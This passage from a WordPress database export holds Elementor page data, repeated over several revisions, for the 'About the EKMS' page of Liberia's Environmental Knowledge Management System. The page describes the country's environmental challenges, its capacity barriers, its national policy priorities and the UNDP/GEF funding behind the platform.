information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation.  The Agenda for Transformation is based on five pillars:<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12049,1958,'_elementor_edit_mode','builder'),(12050,1958,'_elementor_template_type','wp-page'),(12051,1958,'_elementor_version','2.7.5'),(12052,1958,'_wp_page_template','default'),(12053,1958,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12061,1960,'_elementor_edit_mode','builder'),(12062,1960,'_elementor_template_type','wp-page'),(12063,1960,'_elementor_version','2.7.5'),(12064,1960,'_wp_page_template','default'),(12065,1960,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development 